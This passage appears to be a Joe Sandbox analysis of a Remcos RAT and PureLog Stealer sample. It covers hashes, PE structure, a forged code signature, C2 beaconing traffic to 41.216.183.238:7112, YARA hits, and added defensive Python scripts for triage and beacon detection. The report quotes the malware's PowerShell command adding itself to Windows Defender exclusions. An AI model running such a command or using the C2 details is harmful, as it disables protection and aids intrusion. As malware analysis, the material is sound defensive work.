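    if run_level == "LeastPrivilege":
        indicators.append("no elevation requested: persistence without a UAC prompt")
    return {
        "author": author,
        "registered": registered,
        "logon_trigger": logon_trigger,
        "logon_type": logon_type,
        "run_level": run_level,
        "commands": commands,
        "indicators": indicators,
    }


if __name__ == "__main__":
    for key, value in triage_task(SAMPLE_TASK_XML).items():
        print(f"{key}: {value}")
```

On a live host the same XML sits under C:\Windows\System32\Tasks\<task name>; read it as bytes and pass it through decode_task_file, then triage_task. The 2014 registration date in a 2024 sample is itself worth a second look, since a real registration carries the current time.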

Process: C:\Users\user\Desktop\PEbZthAqV9.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 982536
Entropy (8bit): 7.953946844210113
Encrypted: false
SSDEEP: 24576:TuWl35eXIVicKGaiT+zuOiNPjdbdpcg4qCYi:BnXicKE6zuOiNPjdZ4qCYi
MD5: 10AB4B6FB83AEA3840AC04855974F62D
SHA1: C41572120BB8F298D4A8683321E7A3B1CC7C54DA
SHA-256: 8C62537B7B875C364A79B98ADAA8D341B4A52E4D0A27697F0F07B1209ED53301
SHA-512: D414499348356D4028C97718126DBC51AA240A63B70F3236D73003821910735BCEF0761DA0A873B55ABFB18B71820FCD6BF4E58BAC98109274C477CC68633D94
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 63%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8R...............0.................. ........@.. ....................... ............@.................................g...O.......(................6..............p............................................ ............... ..H............text........ ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B........................H...........l..............X............................................0..L.........}.....(.......(......(............s......( ....o!.....("....o#.....($....*.0............}........(%........(&.....,5...(............s......(.....o!.....(.....o#....85....r...p.V...('...o(...tV.......()..........9.....s.........s*...s+...o,......o ...r...po-..........,$..( .....o ...r...po-...s....o.........o/...(0.......o1...(2.......o3...(4.......o5...(6.......o7...(8.......o9...(:.........
                                                                                        Process:C:\Users\user\Desktop\PEbZthAqV9.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:true
                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):7.953946844210113
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:PEbZthAqV9.exe
                                                                                        File size:982'536 bytes
                                                                                        MD5:10ab4b6fb83aea3840ac04855974f62d
                                                                                        SHA1:c41572120bb8f298d4a8683321e7a3b1cc7c54da
                                                                                        SHA256:8c62537b7b875c364a79b98adaa8d341b4a52e4d0a27697f0f07b1209ed53301
                                                                                        SHA512:d414499348356d4028c97718126dbc51aa240a63b70f3236d73003821910735bcef0761da0a873b55abfb18b71820fcd6bf4e58bac98109274c477cc68633d94
                                                                                        SSDEEP:24576:TuWl35eXIVicKGaiT+zuOiNPjdbdpcg4qCYi:BnXicKE6zuOiNPjdZ4qCYi
                                                                                        TLSH:CE251241B3A4AF93CB6E43B4582497005BF1A2073521E71D1DCAA1C71EE3F6687A1F67
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8R...............0.................. ........@.. ....................... ............@................................
                                                                                        Icon Hash:90cececece8e8eb0
                                                                                        Entrypoint:0x4edaba
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:true
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x8B52382E [Tue Jan 26 11:42:38 2044 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                        Signature Valid:false
                                                                                        Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                        Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232 (0x80096010, TRUST_E_BAD_DIGEST: the hash in the signature does not match the file, so the Simon Tatham certificate does not vouch for this binary)
Not Before, Not After
• 13/11/2018 00:00:00 to 08/11/2021 23:59:59
                                                                                        Subject Chain
                                                                                        • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                        Version:3
                                                                                        Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                        Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                        Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                        Serial:7C1118CBBADC95DA3752C46E47A27438
Instruction
jmp dword ptr [00402000h]
(followed by 97 lines of "add byte ptr [eax], al", the disassembly of zero bytes after the 6-byte CLR entry stub; 00402000h is the IAT, whose only entry is mscoree.dll!_CorExeMain)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xeda67          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xee000          0x628         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0xec800          0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xf0000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xeb018          0x70          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
(IMAGE_DIRECTORY_ENTRY_SECURITY holds a raw file offset rather than an RVA, which is why it maps to no section.)
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type           Entropy              Characteristics
.text   0x2000           0xebac0       0xebc00   28d849b38df00cd2a3c34c7664db9ad0  False     0.9610959454533404  OpenPGP Public Key  7.959401786554723    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xee000          0x628         0x800     818a7059877e8a25a9f8ffe45fa4d614  False     0.33984375          data                3.4743788955958435   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xf0000          0xc           0x200     4a1db7927a42c1653a1714cc02821721  False     0.044921875         data                0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
(The "OpenPGP Public Key" label is the file-type guesser matching a PGP packet header in random-looking bytes; at 7.96 bits per byte the .text section is compressed or encrypted payload, not a key.)
Name         RVA      Size   Type                                                                              Language  Country  ZLIB Complexity
RT_VERSION   0xee090  0x398  OpenPGP Public Key                                                                                   0.42282608695652174
RT_MANIFEST  0xee438  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                    0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
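The script below is an added worked check, not part of the Joe Sandbox report: it takes the header, data-directory and section values printed above as literals and reproduces the report's "suspicious time stamp" finding, locates the entrypoint and confirms it is the usual .NET native stub, and verifies that the Authenticode blob (whose directory entry is a file offset, not an RVA) ends exactly at the reported file size. Assumptions: the observation time is taken from the first packet in the network log (09:04:12 CET), the stub length of 6 bytes is the encoding of jmp dword ptr [imm32] shown in the disassembly, and the 7.5 bits-per-byte packing threshold is a conventional choice. Nothing here opens the sample itself.

```python
from datetime import datetime, timedelta, timezone

# Values exactly as the report prints them for PEbZthAqV9.exe; nothing below
# opens the sample itself.
IMAGE_BASE = 0x400000
ENTRYPOINT_VA = 0x4EDABA
TIME_DATE_STAMP = 0x8B52382E
FILE_SIZE = 982536
JMP_TARGET_VA = 0x402000             # operand of the jmp dword ptr [00402000h] at the entrypoint
IAT_DIR = (0x2000, 0x8)              # IMAGE_DIRECTORY_ENTRY_IAT: (RVA, size)
COM_DESCRIPTOR_DIR = (0x2008, 0x48)  # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR: non-zero => CLR image
SECURITY_DIR = (0xEC800, 0x3608)     # IMAGE_DIRECTORY_ENTRY_SECURITY: (file offset, size)
# (name, virtual address, virtual size, raw size, entropy) from the section table
SECTIONS = [
    (".text",  0x2000,  0xEBAC0, 0xEBC00, 7.959401786554723),
    (".rsrc",  0xEE000, 0x628,   0x800,   3.4743788955958435),
    (".reloc", 0xF0000, 0xC,     0x200,   0.10191042566270775),
]
# Assumed "now": when the sandbox ran the file, from the first packet in the log (09:04:12 CET).
OBSERVED_AT = datetime(2024, 12, 8, 8, 4, 12, tzinfo=timezone.utc)
CLR_STUB_LEN = 6                     # FF 25 + 4-byte absolute address


def compile_time(stamp):
    """IMAGE_FILE_HEADER.TimeDateStamp is seconds since 1970-01-01 UTC."""
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=stamp)


def timestamp_suspicious(stamp, observed_at=OBSERVED_AT):
    """A build time later than the moment the file was observed cannot be genuine."""
    return compile_time(stamp) > observed_at


def section_for_rva(rva, sections=SECTIONS):
    """(section name, offset into it, bytes left to its end), or None if unmapped."""
    for name, va, vsize, _, _ in sections:
        if va <= rva < va + vsize:
            return name, rva - va, va + vsize - rva
    return None


def entrypoint_profile():
    """Does the entrypoint look like the standard native stub of a .NET image:
    a 6-byte jmp through the IAT to mscoree!_CorExeMain, with nothing after it?"""
    name, _, remaining = section_for_rva(ENTRYPOINT_VA - IMAGE_BASE)
    return {
        "section": name,
        "bytes_to_section_end": remaining,
        "stub_is_last_code": remaining == CLR_STUB_LEN,
        "jmp_reads_iat": JMP_TARGET_VA - IMAGE_BASE == IAT_DIR[0],
        "has_clr_header": COM_DESCRIPTOR_DIR[1] > 0,
    }


def overlay_size():
    """Bytes after the Authenticode blob; 0 means the signature ends exactly at EOF."""
    start, size = SECURITY_DIR
    return FILE_SIZE - (start + size)


def packed_sections(threshold=7.5):
    """Sections near 8 bits per byte of entropy hold compressed or encrypted data."""
    return [name for name, _, _, _, entropy in SECTIONS if entropy >= threshold]


if __name__ == "__main__":
    print("compiled:", compile_time(TIME_DATE_STAMP), "suspicious:", timestamp_suspicious(TIME_DATE_STAMP))
    print("entrypoint:", entrypoint_profile())
    print("overlay bytes:", overlay_size(), "packed:", packed_sections())
```

The timestamp decodes to Tuesday 26 January 2044, matching the report's conversion and lying almost twenty years after the run, and the entrypoint sits in the last six bytes of .text, so the only native code is the CLR hand-off: everything of interest is in the managed payload that the unpacker-detection signatures flag.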
Timestamp                        SID      Signature                                           Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-12-08T09:04:13.806353+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection         1         192.168.2.4  49737        41.216.183.238  7112       TCP
2024-12-08T09:04:16.575929+0100  2803304  ETPRO MALWARE Common Downloader Header Pattern HCa  3         192.168.2.4  49738        178.237.33.50   80         TCP
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Dec 8, 2024 09:04:12.293368101 CET  49737        7112       192.168.2.4      41.216.183.238
Dec 8, 2024 09:04:12.415834904 CET  7112         49737      41.216.183.238   192.168.2.4
Dec 8, 2024 09:04:12.415935040 CET  49737        7112       192.168.2.4      41.216.183.238
Dec 8, 2024 09:04:12.430011988 CET  49737        7112       192.168.2.4      41.216.183.238
Dec 8, 2024 09:04:12.550755978 CET  7112         49737      41.216.183.238   192.168.2.4
Dec 8, 2024 09:04:13.763019085 CET  7112         49737      41.216.183.238   192.168.2.4
Dec 8, 2024 09:04:13.806353092 CET  49737        7112       192.168.2.4      41.216.183.238
Dec 8, 2024 09:04:14.002053022 CET  7112         49737      41.216.183.238   192.168.2.4
Dec 8, 2024 09:04:14.006853104 CET  49737        7112       192.168.2.4      41.216.183.238
Dec 8, 2024 09:04:14.127255917 CET  7112         49737      41.216.183.238   192.168.2.4
Dec 8, 2024 09:04:14.127337933 CET  49737        7112       192.168.2.4      41.216.183.238
Dec 8, 2024 09:04:14.246711969 CET  7112         49737      41.216.183.238   192.168.2.4
Dec 8, 2024 09:04:14.759079933 CET  7112         49737      41.216.183.238   192.168.2.4
Dec 8, 2024 09:04:14.762331009 CET  49737        7112       192.168.2.4      41.216.183.238
Dec 8, 2024 09:04:14.882203102 CET  7112         49737      41.216.183.238   192.168.2.4
Dec 8, 2024 09:04:14.951006889 CET  7112         49737      41.216.183.238   192.168.2.4
Dec 8, 2024 09:04:15.003310919 CET  49737        7112       192.168.2.4      41.216.183.238
Dec 8, 2024 09:04:15.212419987 CET  49738        80         192.168.2.4      178.237.33.50
Dec 8, 2024 09:04:15.332096100 CET  80           49738      178.237.33.50    192.168.2.4
Dec 8, 2024 09:04:15.332180023 CET  49738        80         192.168.2.4      178.237.33.50
Dec 8, 2024 09:04:15.332479000 CET  49738        80         192.168.2.4      178.237.33.50
Dec 8, 2024 09:04:15.451879978 CET  80           49738      178.237.33.50    192.168.2.4
Dec 8, 2024 09:04:16.574131966 CET  80           49738      178.237.33.50    192.168.2.4
Dec 8, 2024 09:04:16.575928926 CET  49738        80         192.168.2.4      178.237.33.50
Dec 8, 2024 09:04:16.618067980 CET  49737        7112       192.168.2.4      41.216.183.238
Dec 8, 2024 09:04:16.737449884 CET  7112         49737      41.216.183.238   192.168.2.4
Dec 8, 2024 09:04:17.573510885 CET  80           49738      178.237.33.50    192.168.2.4
Dec 8, 2024 09:04:17.573622942 CET  49738        80         192.168.2.4      178.237.33.50
Dec 8, 2024 09:04:45.083527088 CET  7112         49737      41.216.183.238   192.168.2.4
Dec 8, 2024 09:04:45.131937027 CET  49737        7112       192.168.2.4      41.216.183.238
Dec 8, 2024 09:04:45.251285076 CET  7112         49737      41.216.183.238   192.168.2.4
Dec 8, 2024 09:05:15.385699987 CET  7112         49737      41.216.183.238   192.168.2.4
Dec 8, 2024 09:05:15.431586981 CET  49737        7112       192.168.2.4      41.216.183.238
Dec 8, 2024 09:05:15.609720945 CET  49737        7112       192.168.2.4      41.216.183.238
Dec 8, 2024 09:05:15.728981018 CET  7112         49737      41.216.183.238   192.168.2.4
Dec 8, 2024 09:05:45.739732981 CET  7112         49737      41.216.183.238   192.168.2.4
Dec 8, 2024 09:05:45.742008924 CET  49737        7112       192.168.2.4      41.216.183.238
Dec 8, 2024 09:05:45.861308098 CET  7112         49737      41.216.183.238   192.168.2.4
Dec 8, 2024 09:06:05.025604010 CET  49738        80         192.168.2.4      178.237.33.50
Dec 8, 2024 09:06:05.369261980 CET  49738        80         192.168.2.4      178.237.33.50
Dec 8, 2024 09:06:06.057046890 CET  49738        80         192.168.2.4      178.237.33.50
Dec 8, 2024 09:06:07.431725025 CET  49738        80         192.168.2.4      178.237.33.50
Dec 8, 2024 09:06:10.181809902 CET  49738        80         192.168.2.4      178.237.33.50
Dec 8, 2024 09:06:15.666146994 CET  49738        80         192.168.2.4      178.237.33.50
Dec 8, 2024 09:06:16.099191904 CET  7112         49737      41.216.183.238   192.168.2.4
Dec 8, 2024 09:06:16.101653099 CET  49737        7112       192.168.2.4      41.216.183.238
Dec 8, 2024 09:06:16.221074104 CET  7112         49737      41.216.183.238   192.168.2.4
Dec 8, 2024 09:06:26.619292021 CET  49738        80         192.168.2.4      178.237.33.50
Dec 8, 2024 09:06:46.442889929 CET  7112         49737      41.216.183.238   192.168.2.4
                                                                                        Dec 8, 2024 09:06:46.447688103 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:06:46.566988945 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:07:16.817569971 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:07:16.819611073 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:07:16.938889027 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:07:47.240397930 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:07:47.245116949 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:07:47.364563942 CET71124973741.216.183.238192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 8, 2024 09:04:15.063306093 CET | 56598 | 53 | 192.168.2.4 | 1.1.1.1
Dec 8, 2024 09:04:15.204503059 CET | 53 | 56598 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 8, 2024 09:04:15.063306093 CET | 192.168.2.4 | 1.1.1.1 | 0xfffd | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 8, 2024 09:04:15.204503059 CET | 1.1.1.1 | 192.168.2.4 | 0xfffd | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
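The packet tables above record two TCP conversations: the short geoplugin.net exchange on 178.237.33.50:80 and a session to 41.216.183.238:7112 that the sample keeps alive for the whole run, with a server packet and a client reply roughly every 30 seconds. That cadence is the point a practitioner wants to measure rather than eyeball, so the following is an added example (my code, not Joe Sandbox's) that parses the rows in the form the export renders them, with timestamp, ports and addresses concatenated without separators, and scores each remote endpoint for beacon-like regularity. The concatenation is genuinely ambiguous ("4973880192.168.2.4178..." reads as 49738/80 or 4973/880, and "192.168.2.4178..." as .2.4|178... or .2.41|78...), so the parser enumerates every valid cut and keeps the one in which the analysis host (192.168.2.4, taken from the report) uses a port in the Windows default dynamic range and the remote side does not. The dynamic-range start, the 2-second burst window and the 15% spread threshold are my choices, not values from the report; the sample rows are copied from the TCP table.

```python
"""Parse Joe Sandbox packet rows and measure beacon cadence per remote endpoint.

Added example, not Joe Sandbox code.  The export glues timestamp, source port,
dest port, source IP and dest IP together, so the field split is ambiguous.  The
parser enumerates every valid cut and keeps the one where the analysis host uses
an ephemeral port and the remote side does not.
"""
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

LOCAL_IP = "192.168.2.4"   # analysis VM address from the report
EPHEMERAL_MIN = 49152      # Windows default dynamic port range start (assumption)
BURST_GAP = 2.0            # seconds; packets closer than this form one exchange (chosen)
MAX_SPREAD = 0.15          # (max-min)/median of exchange gaps to call a flow periodic (chosen)

# Constructed sample: rows copied from the report's TCP packet table, as exported.
SAMPLE_ROWS = """\
Dec 8, 2024 09:04:16.575928926 CET4973880192.168.2.4178.237.33.50
Dec 8, 2024 09:04:16.618067980 CET497377112192.168.2.441.216.183.238
Dec 8, 2024 09:04:16.737449884 CET71124973741.216.183.238192.168.2.4
Dec 8, 2024 09:04:17.573510885 CET8049738178.237.33.50192.168.2.4
Dec 8, 2024 09:04:45.083527088 CET71124973741.216.183.238192.168.2.4
Dec 8, 2024 09:04:45.131937027 CET497377112192.168.2.441.216.183.238
Dec 8, 2024 09:05:15.385699987 CET71124973741.216.183.238192.168.2.4
Dec 8, 2024 09:05:45.739732981 CET71124973741.216.183.238192.168.2.4
Dec 8, 2024 09:06:05.025604010 CET4973880192.168.2.4178.237.33.50
Dec 8, 2024 09:06:10.181809902 CET4973880192.168.2.4178.237.33.50
Dec 8, 2024 09:06:16.099191904 CET71124973741.216.183.238192.168.2.4
Dec 8, 2024 09:06:26.619292021 CET4973880192.168.2.4178.237.33.50
Dec 8, 2024 09:06:46.442889929 CET71124973741.216.183.238192.168.2.4
Dec 8, 2024 09:07:16.817569971 CET71124973741.216.183.238192.168.2.4
Dec 8, 2024 09:07:47.240397930 CET71124973741.216.183.238192.168.2.4
Dec 8, 2024 09:07:47.245116949 CET497377112192.168.2.441.216.183.238
"""

ROW_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+) CET(?P<glued>\d[\d.]*)$")


def _octet(s):
    return s.isdigit() and int(s) <= 255 and (s == "0" or not s.startswith("0"))


def _port(s):
    return s.isdigit() and int(s) <= 65535 and (s == "0" or not s.startswith("0"))


def candidate_splits(glued):
    """Every (sport, dport, sip, dip) reading of the glued port/IP field."""
    parts = glued.split(".")   # a.b.c.XY.e.f.g where XY = last octet of sip + first octet of dip
    if len(parts) != 7 or not all(_octet(o) for o in parts[1:3] + parts[4:]):
        return []
    head, mid, out = parts[0], parts[3], []   # head = sport + dport + first octet of sip
    for i in range(1, 6):
        for j in range(1, 6):
            sport, dport, a = head[:i], head[i:i + j], head[i + j:]
            if not (_port(sport) and _port(dport) and _octet(a)):
                continue
            for k in range(1, len(mid)):
                d, e = mid[:k], mid[k:]
                if _octet(d) and _octet(e):
                    out.append((int(sport), int(dport),
                                ".".join([a, parts[1], parts[2], d]),
                                ".".join([e] + parts[4:])))
    return out


def parse_row(line, local_ip=LOCAL_IP):
    """Return (epoch_seconds, sip, sport, dip, dport); raise if the row stays ambiguous."""
    m = ROW_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a packet row: {line!r}")
    base, frac = m.group("ts").rsplit(".", 1)   # strptime %f takes at most 6 digits
    secs = (datetime.strptime(base, "%b %d, %Y %H:%M:%S") - datetime(1970, 1, 1)).total_seconds()
    secs += float("0." + frac)
    readings = []
    for sport, dport, sip, dip in candidate_splits(m.group("glued")):
        if sip == local_ip:
            lport, rport = sport, dport
        elif dip == local_ip:
            lport, rport = dport, sport
        else:
            continue                     # neither side is the analysis host: wrong cut
        if lport >= EPHEMERAL_MIN and rport < EPHEMERAL_MIN:
            readings.append((secs, sip, sport, dip, dport))
    if len(readings) != 1:
        raise ValueError(f"{len(readings)} plausible readings for {line!r}")
    return readings[0]


def beacon_report(rows, local_ip=LOCAL_IP):
    """Group packets per remote endpoint, collapse them into exchanges, score regularity."""
    times = defaultdict(list)
    for secs, sip, sport, dip, dport in rows:
        remote = f"{dip}:{dport}" if sip == local_ip else f"{sip}:{sport}"
        times[remote].append(secs)
    report = {}
    for remote, ts in times.items():
        ts.sort()
        starts, last = [ts[0]], ts[0]
        for t in ts[1:]:
            if t - last > BURST_GAP:     # quiet gap: the next packet opens a new exchange
                starts.append(t)
            last = t
        gaps = [b - a for a, b in zip(starts, starts[1:])]
        period = median(gaps) if len(gaps) >= 3 else None
        spread = (max(gaps) - min(gaps)) / period if period else None
        report[remote] = {"bursts": len(starts), "period": period, "spread": spread,
                          "beacon": spread is not None and spread < MAX_SPREAD}
    return report


if __name__ == "__main__":
    parsed = [parse_row(r) for r in SAMPLE_ROWS.splitlines()]
    for remote, stats in beacon_report(parsed).items():
        print(remote, stats)
```

On these rows the 41.216.183.238:7112 flow collapses to eight exchanges about 30.35 seconds apart with a spread under 7%, while the 178.237.33.50:80 flow has four irregular bursts (the request, then retransmissions and the close) and is not flagged. Rows the disambiguation cannot settle raise instead of guessing, which is the behaviour you want when the output feeds a detection.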
                                                                                        • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49738 | 178.237.33.50 | 80 | 7952 | C:\Users\user\Desktop\PEbZthAqV9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 09:04:15.332479000 CET | 71 | OUT | GET /json.gp HTTP/1.1
                                                                                        Host: geoplugin.net
                                                                                        Cache-Control: no-cache
Dec 8, 2024 09:04:16.574131966 CET | 1171 | IN | HTTP/1.1 200 OK
                                                                                        date: Sun, 08 Dec 2024 08:04:16 GMT
                                                                                        server: Apache
                                                                                        content-length: 963
                                                                                        content-type: application/json; charset=utf-8
                                                                                        cache-control: public, max-age=300
                                                                                        access-control-allow-origin: *
                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                        Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                                                                                        Target ID:0
                                                                                        Start time:03:04:02
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Users\user\Desktop\PEbZthAqV9.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\PEbZthAqV9.exe"
                                                                                        Imagebase:0x5d0000
                                                                                        File size:982'536 bytes
                                                                                        MD5 hash:10AB4B6FB83AEA3840AC04855974F62D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1834812761.0000000007410000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1831199918.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:03:04:09
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe"
                                                                                        Imagebase:0x960000
                                                                                        File size:433'152 bytes
